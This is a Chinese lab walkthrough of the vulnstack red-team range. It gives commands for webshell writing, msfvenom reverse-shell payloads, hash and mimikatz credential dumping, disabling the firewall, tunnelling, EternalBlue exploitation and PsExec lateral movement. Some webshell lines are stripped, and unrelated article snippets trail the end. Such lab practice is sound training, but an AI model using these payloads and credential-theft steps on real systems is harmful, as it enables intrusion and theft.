802.1Q
802.1Q

vulnstack(一) 红日靶场复现

说明:关于该复现中的问题欢迎vx交流:Bestboysendit

目录
一、环境配置:
二、内网getshell
3-(1)phpmyadmin
3-(2)备份文件:
三、内网-连接
1、基于MSF
2、基于Cobalt Strike
3、CS与kali联动
(1)CS下的会话传给MSF
(2)MSF下的会话传给CS
四、内网-横向
4.1 搭建隧道
4.1.1 使用CS搭建隧道
4.1.2 使用msf搭建隧道
4.2内网信息收集
五、内网攻击
1、MS08-067
2、SMB远程桌面口令猜测
3、RPC DCOM 服务漏洞
4、ms17-010
psexec攻击
域hash传递攻击

一、环境配置:

2008:10.10.10.3 域控主机
win7:10.10.10.2 host-only+nat 192.168.3.11
2k3:10.10.10.4 域控客户端

kali:192.168.3.136
vulnstack(一) 红日靶场复现_第1张图片

win7开启phpstudy,下载的靶机桌面上没有快捷方式,用everything搜索一下。

二、内网getshell

1、nmap开启扫描:
经排查144的地址为所需地址,且80端口是开启的

 nmap 192.168.3.0/24                                                                
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 09:01 EDT
Nmap scan report for 192.168.3.144
Host is up (0.010s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1028/tcp open  unknown
1029/tcp open  ms-lsa
1030/tcp open  iad1
3306/tcp open  mysql

Nmap done: 256 IP addresses (4 hosts up) scanned in 4.73 seconds

2、访问192.168.3.144的80端口:
phpinfo() 页面,且留有绝对路径,管理邮箱:
vulnstack(一) 红日靶场复现_第2张图片

猜密码:root/root 弱口令
vulnstack(一) 红日靶场复现_第3张图片

尝试使用file_into或日志写入webshell。
secure_file_priv的值为“空”时允许任意文件写入,为“null”时不允许任何写入。该值也可以为路径;

show global variables like "%secure%";

这里行不通:
vulnstack(一) 红日靶场复现_第4张图片

3、御剑扫描后台:
vulnstack(一) 红日靶场复现_第5张图片

3-(1)phpmyadmin
可以登录:root/root
vulnstack(一) 红日靶场复现_第6张图片

以下命令都是通过phpmyadmin界面执行
尝试通过慢日志写入shell:
①查询慢日志超时时间:10s
vulnstack(一) 红日靶场复现_第7张图片

②set global slow_query_log = 1; 开启可更改
vulnstack(一) 红日靶场复现_第8张图片

③set global slow_query_log_file = “c:\phpstudy\WWW\shell.php”;
修改日志的地址,
确认修改情况:
vulnstack(一) 红日靶场复现_第9张图片

④注入:

select ';' or sleep(11);

vulnstack(一) 红日靶场复现_第10张图片

⑤写入成功:
vulnstack(一) 红日靶场复现_第11张图片

⑥写入一句话:

 select '' or sleep(11);

⑦菜刀连接:

vulnstack(一) 红日靶场复现_第12张图片

3-(2)备份文件:
备份显示为:yxcms系统
vulnstack(一) 红日靶场复现_第13张图片

①访问:
vulnstack(一) 红日靶场复现_第14张图片

②在留言板中插入xss测试代码
vulnstack(一) 红日靶场复现_第15张图片

③进入后台审核:
vulnstack(一) 红日靶场复现_第16张图片

④模板文件是php文件,直接添加木马
vulnstack(一) 红日靶场复现_第17张图片

⑤文件路径:…要根据之前所给的beifen.rar来确定位置:
思路:看一下与写入的shell.php模板文件在一起的其他文件名,然后去beifen.rar查找位置:
vulnstack(一) 红日靶场复现_第18张图片

⑥连接:

vulnstack(一) 红日靶场复现_第19张图片

三、内网-连接

1、基于MSF
01使用msfvenom生成payload文件
地址:kali地址,端口,随便写一个不冲突的

msf6 >  msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.3.136 lport=1234 -f exe -o eye2.exe
[*] exec: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.3.144 lport=6666 -f raw > eye.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1114 bytes
msf6 > ls
[*] exec: ls

arget    ctf      Documents  eye2.exe  Pictures  Templates
asd.exe  Desktop  Downloads  Music    Public    Videos
msf6 >
msf6 > pwd
[*] exec: pwd

/home/buna
msf6 >

02使用菜刀上传
到www目录下
vulnstack(一) 红日靶场复现_第20张图片

03使用handler模块接收反弹模块,在1234端口上进行监听,访问shell.php,连接成功
下面地址也应该是kali的地址
vulnstack(一) 红日靶场复现_第21张图片

04上线:

vulnstack(一) 红日靶场复现_第22张图片

05提权:
这里直接是administrator,所有可以直接提到system,

meterpreter > getuid
Server username: GOD\Administrator
meterpreter >
meterpreter >
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
meterpreter > getuid
Server username: NT AUTH

ORITY\SYSTEM
meterpreter >

06获取密码:

Windows系统下的hash密码格式为:
用户名称:RID:LM-HASH值:NT-HASH值
NT-HASH hash生产方式:

  1. 将明文口令转换成十六进制的格式
  2. 转换成Unicode格式,即在每个字节之后添加0x00
  3. 对Unicode字符串作MD4加密,生成32位的十六进制数字串

eg:用户密码为test123
转换成十六进制的格式为74657374313233
转换成Unicode格式为7400650073007400310032003300
对字符串7400650073007400310032003300作MD4加密,结果为c5a237b7e9d8e708d8436b6148a25fa1

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY fd4639f4e27c79683ae9fee56b44393f...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::


meterpreter >

04mimikatz
加载 mimikatz 模块,加载模块前需要先将meterpreter迁移到64位的进程,该进程也需要是system权限:

ps
migrate PID
load mimikatz
mimikatz_command -f sekurlsa::searchPasswords

meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.
meterpreter >

05 kiwi
load wiki
creds_all
这里不是很成功。。

11、远程桌面链接

06开启远程桌面:
run post/windows/manage/enable_rdp
vulnstack(一) 红日靶场复现_第23张图片

07连接:
vulnstack(一) 红日靶场复现_第24张图片

2、基于Cobalt Strike
给服务端程序执行权限
在这里插入图片描述

执行cs服务端程序,开启服务,ip是kali的ip,密码是123
vulnstack(一) 红日靶场复现_第25张图片

重新打开一个终端,在kali上执行cs客户端程序,用户名随意,密码123
vulnstack(一) 红日靶场复现_第26张图片

创建一个监听器,ip就是kali的ip

vulnstack(一) 红日靶场复现_第27张图片vulnstack(一) 红日靶场复现_第28张图片

生成生成Web Delivery
vulnstack(一) 红日靶场复现_第29张图片

选择刚刚创建的那个Listener
vulnstack(一) 红日靶场复现_第30张图片

会生成一条命令,使用菜刀连接webshell,打开虚拟终端,输入这条命令
vulnstack(一) 红日靶场复现_第31张图片
在这里插入图片描述

目标主机就上线了,你就可以使用cs对它进行操作啦
vulnstack(一) 红日靶场复现_第32张图片

比如屏幕截图,右击连接->Explore->Screenshot,再点击上面的图片小图片进入屏幕截图视图(点击View-Screenshot也行),就能看到目标的屏幕截图了

收集信息:
vulnstack(一) 红日靶场复现_第33张图片vulnstack(一) 红日靶场复现_第34张图片

使用 hashdump 和 logonpasswords 读内存和注册表密码,在 Credentials 模块下查看
vulnstack(一) 红日靶场复现_第35张图片vulnstack(一) 红日靶场复现_第36张图片
vulnstack(一) 红日靶场复现_第37张图片

2、使用mimikatz.exe程序
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords” exit
vulnstack(一) 红日靶场复现_第38张图片

11、远程桌面链接

3、CS与kali联动
(1)CS下的会话传给MSF
使用msf监听模块,ip就是kali的ip,端口就是监听的端口,payload要和cs相同,然后运行,开始监听
vulnstack(一) 红日靶场复现_第39张图片

①首先cobaltstrike创建监听器:

vulnstack(一) 红日靶场复现_第40张图片

②在msf控制台执行如下操作:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true   #payload_inject执行之后会在本地产生一个新的handler,设置为true表示不重复生成
set lhost xxxx                 #公网vps ip
set lport 14444                 #监听端口 
set session 1                   #派发session id
exploit

③得到shell:
点击要连接的会话->Spawn->选择上面的监听
vulnstack(一) 红日靶场复现_第41张图片

vulnstack(一) 红日靶场复现_第42张图片

(2)MSF下的会话传给CS

首先cobaltstrike创建监听器:
vulnstack(一) 红日靶场复现_第43张图片

msf:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true   #payload_inject执行之后会在本地产生一个新的handler,设置为true表示不重复生成
set lhost xxxx                 #公网vps ip
set lport 14444                 #监听端口 
set session 1                   #派发session id
exploit

vulnstack(一) 红日靶场复现_第44张图片

四、内网-横向

4.1 搭建隧道
4.1.1 使用CS搭建隧道
前提是仅通过CS拿到会话或者MSF拿到会话派送给CS
cs配置:
打开会话,输入socks 1234
vulnstack(一) 红日靶场复现_第45张图片

进入代理视图,选中会话点击Tunnel,复制生成的文字

vulnstack(一) 红日靶场复现_第46张图片
vulnstack(一) 红日靶场复现_第47张图片

msf配置:
粘贴cs生成的命令 setg Proxies socks4:127.0.0.1:1234
setg ReverseAllowProxy true 允许反向代理
在这里插入图片描述

修改/etc/proxychains.conf文件
vulnstack(一) 红日靶场复现_第48张图片

4.1.2 使用msf搭建隧道
该部分可直接跳过到4.2部分,因为这里失败了
横向渗透前,先将该web服务器配置为代理服务器当作跳板机。
msf+proxychains

可用msf直接搭建sock隧道:
进入session,自动创建路由:

run post/multi/manage/autoroute


meterpreter > run post/multi/manage/autoroute

[!] SESSION may not be compatible with this module.
[*] Running module against STU1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.10.10.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 192.168.3.0/255.255.255.0 from host's routing table.
meterpreter >

查看路由:
run autoroute -p


meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.10.10.0         255.255.255.0      Session 2
   169.254.0.0        255.255.0.0        Session 2
   192.168.3.0        255.255.255.0      Session 2

meterpreter >

退到上层,使用socks4a进行代理,端口与proxychains里设置一致即可:
因为kali2021没有sock4a选项,故停止继续
background
use auxiliary/server/socks4a
run
在这里插入图片描述
run后 可用jobs查看任务是否执行:

jobs
在这里插入图片
配置proxychains:

vi /etc/proxychains.conf
在这里插入图片描述
全局代理测试:
在这里插入图片描述
浏览器代理测试:
在这里插入图片描述
cobaltstrike + proxifer

cs开启socks代理:
在这里插入图片描述
自定义端口:
在这里插入图片描述

proxifer设置:
在这里插入图片描述
测试:
在这里插入图片描述

4.2内网信息收集
该部分承接4.1.1
使用msf的扫描模块扫描内网主机

vulnstack(一) 红日靶场复现_第49张图片vulnstack(一) 红日靶场复现_第50张图片

使用msf内置模块进行存活主机探测

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机

内网主机端口扫描

proxychains nmap -Pn -sT 172.20.10.10
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(默认扫描1-10000)
内网主机服务探测
auxiliary/scanner/ftp/ftp_version            #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version            #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version      #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp                #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version          #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title                 #探测内网http服务的标题
auxiliary/scanner/smb/smb_version            #发现内网smb服务,基于默认的445端口   
auxiliary/scanner/mssql/mssql_schemadump     #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump     #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version        #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner            #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server         #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version            #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname             #探测内网主机的netbios名字

下面内容部分因为需要msf的会话,没有复现。环境中内网网段为10.10.10.0 案例中给的192.168.52.0

补丁信息:
在这里插入图片描述

安装软件信息
vulnstack(一) 红日靶场复现_第51张图片

路由信息
添加路由,使得 MSF 能够通过 Win7 路由转发访问192.168.52.0 网段
vulnstack(一) 红日靶场复现_第52张图片

arp扫描52网段
vulnstack(一) 红日靶场复现_第53张图片

关闭防火墙,再使用nmap扫描
netsh advfirewall set allprofiles state off
vulnstack(一) 红日靶场复现_第54张图片

扫描太慢,,,直接借图:
vulnstack(一) 红日靶场复现_第55张图片

使用nmap的vuln漏洞扫描脚本进行扫描

在这里插入图片描述

Nmap scan report for 10.10.10.2
Host is up (0.00067s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.2
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.10.10.2:80/
|     Form id:
|     Form action: /l.php#bottom
|
|     Path: http://10.10.10.2:80/l.php
|     Form id:
|_    Form action: /l.php#bottom
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /phpinfo.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /phpMyAdmin/: phpMyAdmin
|_  /PHPMyAdmin/: phpMyAdmin
| http-phpself-xss:
|   VULNERABLE:
|   Unsafe use of $_SERVER["PHP_SELF"] in PHP files
|     State: VULNERABLE (Exploitable)
|       PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|
|     Extra information:
|
|   Vulnerable files with proof of concept:
|     http://10.10.10.2/l.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
|   Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.2
|     References:
|       https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
|_      http://php.net/manual/en/reserved.variables.server.php
| http-sql-injection:
|   Possible sqli for queries:
|     http://10.10.10.2:80/l.php?act=Function%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?act=phpinfo%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?act=Function%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?act=phpinfo%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider
|   Possible sqli for forms:
|     Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|       funName
|     Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|_      funName
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1029/tcp open  ms-lsa
1030/tcp open  iad1
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
3389/tcp open  ms-wbt-server
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: SMB: Failed to receive bytes: TIMEOUT

Nmap done: 1 IP address (1 host up) scanned in 140.66 seconds

使用msf辅助模块进行扫描,查看是否存在ms17-010漏洞
在这里插入图片描述
在这里插入图片描述

在cs上使用目标机器上的nmap,对内网其他主机进行扫描
注:有时beacon连接会执行不了命令,或者连接断开,或者制作不了scripted web delivery这时要重启一下cs服务器。
主机10.10.10.4信息

beacon> shell nmap --script=vuln 10.10.10.4
[*] Tasked beacon to run: nmap --script=vuln 10.10.10.4
[+] host called home, sent: 60 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-28 11:30 ?D1ú±ê×?ê±??

[+] received output:
Nmap scan report for 10.10.10.4
Host is up (0.00s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
135/tcp  open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp  open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
777/tcp  open  multiling-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open  NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1026/tcp open  LSA-or-nterm
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1038/tcp open  mtqp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1044/tcp open  dcutility
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6002/tcp open  X11:2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7001/tcp open  afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7002/tcp open  afs3-prserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8099/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:11:06:63 (VMware)

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 127.98 seconds

主机10.10.10.3信息

msf6 > nmap --script=vuln 10.10.10.3
[*] exec: nmap --script=vuln 10.10.10.3

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 23:30 EDT
Nmap scan report for 10.10.10.3
Host is up (0.0011s latency).
Not shown: 985 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
|_sslv2-drown:
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
|_sslv2-drown:
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF

Nmap done: 1 IP address (1 host up) scanned in 62.75 seconds

五、内网攻击

1、MS08-067
使用cs将msf带入内网后,使用ms08-067攻击模块攻击内网主机,注意使用的是反向代理,所以这里payload需要使用正向
vulnstack(一) 红日靶场复现_第56张图片

搞不进去,,,
vulnstack(一) 红日靶场复现_第57张图片

2、SMB远程桌面口令猜测
使用msf的smb口令猜测模块,配置参数用于smb口令爆破
vulnstack(一) 红日靶场复现_第58张图片

3、RPC DCOM 服务漏洞
漏洞原理:
微软修改 dcerpc 框架后形成自己的 RPC 框架来处理进程间的通信。微软的 RPC 框架在处理 TCP/IP 信息交换过程中存在的畸形消息时,未正确处理,导致缓冲区溢出漏洞;
此漏洞影响使用 RPC 框架的 DCOM 接口,DCOM 接口用来处理客户端机器发送给服务器的 DCOM 对象激活请求,如 UNC 路径
漏洞利用:
vulnstack(一) 红日靶场复现_第59张图片

4、ms17-010

```handlebars
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.10.4       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted

: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.10.10.4       no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > run

关掉防火墙才可以拿到会话:
vulnstack(一) 红日靶场复现_第60张图片

5、psexec攻击

内网中,最总要的还是域管理员账号,有了域管理员账号后,可以使用该域管理员账号密码利用 psexec 登录域内任何一台开启了admin$共享(该共享默认开启) 的主机。
下载地址:
pstools:https://download.sysinternals.com/files/PSTools.zip

psexec.exe \10.10.10.4 -u god\administrator -p hongrisec@2019 cmd
这里没开启

PS F:\security\内网\PSTools> .\PsExec.exe  \\10.10.10.4 -u god\administrator -p hongrisec@2018 cmd

PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

Couldn't access 10.10.10.4:
找不到网络路径。

Make sure that the default admin$ share is enabled on 10.10.10.4.
PS F:\侠之大者,为国为民\内网\PSTools>

六、总结:

1、整体比较简单,漏洞都可以用工具扫出来,只要工具用的到位!
2、可以作为整体流程演示:从外网发现漏洞——getshell——拿到会话——内网信息收集——内网攻击的流程都有!
3、msf+cs=yyds

你可能感兴趣的:(网络通信,ssh,linux,flask,网络安全)

  • deepin操作系统登录问题全面分析与解决方案 deepin
    摘要:deepin操作系统,作为一款基于Linux的国产操作系统,以其美观的界面和稳定的性能受到用户的喜爱。然而,用户在使用过程中可能会遇到无法登录的问题。本文将对deepin无法登录的问题进行详细分析,并提供相应的解决方案。引言deepin操作系统在升级或使用过程中可能会出现无法登录的情况,这可能是由于系统升级、配置文件错误或软件冲突等原因造成的。本文旨在帮助用户解决这些问题,确保系统的正常使用
  • Ubuntu系统上安装Docker教程 goomind 软件安装教程dockerubuntu容器
    文章目录前言一、Docker是什么?二、安装步骤结束语前言Docker是一种非常流行的容器化技术,可以帮助开发人员将应用程序和服务打包到容器中,实现跨平台的部署和运行。博主作为AI的科研人员,平时用的Linux发行版是Ubuntu,所以本文将介绍如何在Ubuntu系统上安装Docker,并配置Docker环境,以便在容器中运行应用程序和服务。无论是初学者还是有一定Docker使用经验的读者都能从中
  • deepin 系统网络信息查看指南 deepin
    deepin系统网络信息查看指南在Linux操作系统,如deepin和Ubuntu中,我们可以通过多种shell命令来查看网络信息和网络状态。本文将介绍这些命令,帮助您更好地理解和监控您的网络环境。1.ifconfig命令ifconfig是查看所有网卡信息的命令,但已被弃用,推荐使用ip命令。ifconfig2.ip命令ip命令用于查看所有网卡的信息。#查看所有接口信息:ipaddrshow#查看
  • 松散比较(PHP)(小迪网络安全笔记~ 1999er 网络安全学习笔记phpweb安全笔记网络安全安全
    免责声明:本文章仅用于交流学习,因文章内容而产生的任何违法&未授权行为,与文章作者无关!!!附:完整笔记目录~ps:本人小白,笔记均在个人理解基础上整理,若有错误欢迎指正!1.3松散比较(PHP)引子:本章主要介绍一些由PHP自身语言特性可能产生的脆弱性,该内容往往被应用于PHPCTF入门题中,但在PHPWeb开发时也可能被使用。====是php中的比较运算符,用于判断==左右两边的值是否相等。若
  • 操作系统之输入输出管理 DKPT #操作系统开发语言学习c语言笔记算法
    操作系统中的输入输出(I/O)管理主要涉及I/O设备的分配、控制以及数据的传输。以下是对操作系统中I/O管理的详细解释:一、I/O设备I/O设备是计算机中用于数据输入和输出的外部设备,如键盘、鼠标、显示器、打印机等。这些设备按照不同的分类标准可以分为多种类型,如按使用特性分为人机交互类设备、存储设备和网络通信设备;按传输速率分为低速设备、中速设备和高速设备;按信息交换的单位分为块设备和字符设备等。
  • 基于STM32 + W5500的以太网功能开发与时间同步方案 嵇英芹
    基于STM32+W5500的以太网功能开发与时间同步方案STM32W5500移植NTP更新时间.rar项目地址:https://gitcode.com/open-source-toolkit/60355概述本项目展示了如何在STM32微控制器上集成W5500以太网控制器,实现了网络通信的基础,特别地,通过移植Ethernet相关驱动文件,结合NTP协议,实现了精确的RTC(实时时钟)对时功能。此外
  • 通过ssh连接debian 翻滚吧键盘 sshdebian服务器
